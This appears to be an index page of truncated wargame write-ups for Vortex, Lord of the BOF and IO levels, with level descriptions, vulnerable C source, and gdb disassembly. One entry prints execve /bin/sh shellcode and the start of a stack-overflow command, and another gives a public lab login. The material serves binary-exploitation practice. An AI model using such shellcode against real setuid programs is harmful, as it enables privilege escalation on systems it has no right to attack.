
wargame

vortex4
Vortex Level 4 → Level 5
To exec or not to exec
This is the common format string bug, exploit it with care though as a check is made with argc. What is the layout of a process’s memory? How are programs executed?
Reading Material
Format String Technique
Exploiting Format String Vulnerabilities
Bypassing StackGuard and StackShield
Included file: vortex4.c
// -- andrewg, original author was zen-parse :) #..
vortex3
Vortex Level 3 → Level 4
A Stack Overflow with a Difference
This level is pretty straight forward. Just sit down and understand what the code is doing. Your shellcode will require a setuid(LEVEL4_UID) since bash drops effective privileges. You could alternatively write a quick setuid(geteuid()) wrapper around bash.
NOTE: ctors/dtors might no longer be writable, although this level is compiled with ..
vortex2
Vortex Level 2 → Level 3
Level Goal
Create a special tar file
Helpful Reading Material
GNU tar manual
Included file: vortex2.c
#include #include #include
int main(int argc, char **argv) {
  char *args[] = { "/bin/tar", "cf", "/tmp/ownership.$$.tar", argv[1], argv[2], argv[3] };
  execv(args[0], args);
}
Interpreting the source, the execv function runs the following command:
/bin/tar -cf /tmp/ownership.$$.tar argv[1] argv[2] argv[3]
The c option of tar is for a new..
cobolt to goblin
1. ret2libc
[cobolt@localhost cobolt]$ gdb -q goblin
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x80483f8 : push %ebp
0x80483f9 : mov %ebp,%esp
0x80483fb : sub %esp,16
0x80483fe : lea %eax,[%ebp-16]
0x8048401 : push %eax
0x8048402 : call 0x804830c
0x8048407 : add %esp,4
0x804840a : lea %eax,[%ebp-16]
0x804840d : push %eax
0x804840e : push 0x8048470
0x8048413 : ..
gremlin to cobolt
1. ret2libc
[gremlin@localhost gremlin]$ gdb -q cobolt
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048430 : push %ebp
0x8048431 : mov %ebp,%esp
0x8048433 : sub %esp,16
0x8048436 : cmp DWORD PTR [%ebp+8],1
0x804843a : jg 0x8048453
0x804843c : push 0x80484d0
0x8048441 : call 0x8048350
0x8048446 : add %esp,4
0x8048449 : push 0
0x804844b : call 0x8048360
0x804..
gate to gremlin
1. Attack using an environment variable
bash2 // bash treats the bad char as null
export hack=`perl -e 'print "\x90"x100,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";'`
cat > env.c
#include #include
int main(int argc,char *argv[]){printf("%p\n",getenv(argv[1]));return 0;}
Ctrl+D
gcc -o env env.c
./env hack // returns 0xbffffe30 as the result
./gremlin `perl -e 'print "\x90"x260,"\x30\xfe\xff\x..
level2
level2@io:/levels$ cat level02.c
//a little fun brought to you by bla
#include #include #include #include
void catcher(int a){
  setresuid(geteuid(),geteuid(),geteuid());
  printf("WIN!\n");
  system("/bin/sh");
  exit(0);
}
int main(int argc, char **argv){
  puts("source code is available in level02.c\n");
  if (argc != 3 || !atoi(argv[2])) // two arguments must be given, and the second argument must not be 0.
    return 1;
  signal(SIGFPE, catcher); //S..
Analysis of questions that came up while solving level1
1. When main calls a function without passing it any arguments, how does the function still run normally?
2. How does the YouWin function spawn a shell?
3. Solving it by tracing fscanf backwards
I knew what fscanf was, but out of stubbornness about solving it first without looking up the reference, I solved the problem by backtracing.
0804809f :
 804809f: 81 ec 00 10 00 00 sub $0x1000,%esp
 80480a5: b8 03 00 00 00 mov $0x3,%eax // read system call
 80480aa: bb 00 00 00 00 mov $0x0,%ebx // fd 0 (stdin)
 80480af: 89 e1 mov %esp,%ecx
 80480b1: ba 00 10 00 00 mov $0x1000,%edx
 80480b6: cd ..
level1
Connect with PuTTY
ssh level1@io.smashthestack.org
password: level1
level1@io:~$ cd /levels
level1@io:/levels$ gdb -q level01
Reading symbols from /levels/level01...(no debugging symbols found)...done.
(gdb) disas main
Dump of assembler code for function main:
0x08048080 : push $0x8049128
0x08048085 : call 0x804810f
0x0804808a : call 0x804809f
0x0804808f : cmp $0x10f,%eax
0x08048094 : je 0x80480dc
0x0804809a ..
vortex1
Using PuTTY, ssh into vortex.labs.overthewire.org with the account obtained from vortex0.
First, the target is located at /games/vortex/vortex1, and its source code is on the corresponding level page of the website.
#include #include #include #include
#define e(); if(((unsigned int)ptr & 0xff000000)==0xca000000) { setresuid(geteuid(), geteuid(), geteuid()); execlp("/bin/sh", "sh", "-i", NULL); }
void print(unsigned char *buf, int len) {
  int i;
  printf("[ ");
  for(i=0; i < len..